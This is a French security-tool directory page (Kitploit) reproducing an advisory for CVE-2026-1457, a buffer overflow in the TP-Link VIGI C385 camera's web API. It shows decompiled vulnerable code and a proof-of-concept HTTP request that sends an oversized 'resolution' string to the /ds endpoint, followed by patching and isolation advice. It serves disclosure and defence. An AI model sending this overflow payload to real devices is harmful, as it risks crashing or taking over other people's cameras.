Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1457 — Fournit une analyse détaillée et une preuve de concept pour CVE-2026-1457, un débordement de tampon authentifié dans l'API web TP-Link VIGI C385 menant à l'exécution de code à distance. | Kitploit
Outils/GitHubGitHub/ii4gsp/cve-2026-1457
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceExploitation de Binaires
GitHubii4gsp/cve-2026-1457

CVE-2026-1457

Fournit une analyse détaillée et une preuve de concept pour CVE-2026-1457, un débordement de tampon authentifié dans l'API web TP-Link VIGI C385 menant à l'exécution de code à distance.

Voir le dépôt
6il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-1457 : Exécution de code à distance authentifiée sur TP-Link VIGI C385

Présentation

CVE-2026-1457 est une vulnérabilité de dépassement de tampon authentifiée dans l'API web du TP-Link VIGI C385 V1. Cette vulnérabilité permet à des attaquants authentifiés d'exécuter du code à distance (RCE).

Score CVSS v4.0 : 8,5 (Élevé)

CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Produits concernés

Modèle de produitVersion affectée
VIGI C385 V1< 3.1.1 Build 251124 Rel.50371n

Détails de la vulnérabilité

Emplacement de la vulnérabilité

La fonction set_resolution_18AAD8 utilise strcpy pour copier l'entrée utilisateur dans un tampon sans validation de longueur, ce qui entraîne un dépassement de tampon.

Analyse du code vulnérable

root@kitploit:~
int __fastcall set_resolution_18AAD8(int a1, char a2)
{
  const char *string_origin; // r5
  const char *v4; // r4
  int result; // r0
  char v6[72]; // [sp+0h] [bp-A0h] BYREF
  char v7[88]; // [sp+48h] [bp-58h] BYREF

  memset(v6, 0, sizeof(v6));
  memset(v7, 0, 72);
  string_origin = jso_obj_get_string_origin(a2, (char)"secname");
  v4 = jso_obj_get_string_origin(a2, (char)"resolution");
  sub_1FE6BC((int)"/video/main", (int)v6, 0x48u);
  sub_1FE6BC((int)"/video/minor", (int)v7, 0x44u);
  if ( !strcmp(string_origin, "main") )
  {
    result = strcmp(v4, &v6[29]);
    if ( result )                               // true if v4 is greater than &v6[29]
    {
      sub_1FE6BC((int)"/video/main", (int)v6, 0x48u);
      strcpy(&v6[29], v4);                      // ⚠️ buffer overflow
      sub_1FE804("/video/main", v6, 72);
      return 0;
    }
  }
  else if ( !strcmp(string_origin, "minor") )
  {
    result = strcmp(v4, &v7[29]);
    if ( result )
    {
      sub_1FE6BC((int)"/video/minor", (int)v7, 0x48u);
      strcpy(&v7[29], v4);                      // ⚠️ buffer overflow
      sub_1FE804("/video/minor", v7, 72);
      return 0;
    }
  }
  else
  {
    msg_debug(3, "http_do_setResolution", 3137, "[HTTPD]set resolution param error.\n");
    return -40209;
  }
  return result;
}

Cause racine

  1. Le tampon v6 est déclaré sur 72 octets, mais strcpy est effectué à la position &v6[29].
  2. Le tampon v7 est déclaré sur 88 octets, mais strcpy est effectué à la position &v7[29].
  3. L'entrée utilisateur (v4) n'est pas validée en termes de longueur avant l'utilisation de strcpy, ce qui provoque un dépassement de tampon.
  4. L'espace restant dans le tampon n'est que de 43 octets (v6) et 59 octets (v7) respectivement, mais des chaînes plus longues peuvent être copiées.

Scénario d'attaque

Conditions requises

  • Session authentifiée (jeton stok valide requis)
  • Accès réseau (même réseau ou réseau administratif)

Vecteur d'attaque

Un attaquant peut exploiter la fonctionnalité set_resolution du point de terminaison /ds pour envoyer des charges utiles malveillantes.

Preuve de concept

Exemple de requête HTTP

root@kitploit:~
POST /stok=9p73~f9L0fGs33wt3D3XDc)7u)!wt83f/ds HTTP/1.1
Host: 192.168.0.100
Content-Length: 3015
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Origin: https://192.168.0.100
Connection: close

{
  "video": {
    "set_resolution": {
      "secname": "main",
      "resolution": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    }
  },
  "method": "do"
}

Résultat de l'exploitation

Ce document ne contient pas de code d'exploitation exécutable. La capture d'écran suivante démontre une exploitation réussie aboutissant à une connexion shell inversée :

Réussite du shell inversé

Atténuation

Actions recommandées

  1. Mise à jour du firmware : Mettez à jour les appareils concernés vers la version 3.1.1 Build 251124 Rel.50371n ou ultérieure.

  2. Isolation du réseau : Si possible, placez les appareils VIGI C385 dans un segment réseau isolé.

  3. Contrôle d'accès : Restreignez l'accès à l'interface de gestion aux seuls réseaux de confiance.

  4. Surveillance : Surveillez les comportements réseau ou les activités anormales des appareils.

Mesures d'atténuation temporaires

  • Bloquez l'accès externe à l'interface de gestion web.
  • Utilisez des identifiants d'authentification forts.
  • Désactivez les services réseau inutiles.

Chronologie

  • 2025-04-25 : Vulnérabilité découverte
  • 2025-08-29 : Vulnérabilité signalée à TP-Link
  • 2026-01-29 : Avis de sécurité publié
  • 2026-01-29 : Divulgation publique

Références

  • Avis de sécurité TP-Link
  • CVE-2026-1457

Crédits

Cette vulnérabilité a été découverte et analysée par :

  • SeonGoo Lee (classun9)
  • MinSeong Kim (ii4gsp)

de NSHC RedAlert Labs

Télécharger l’outil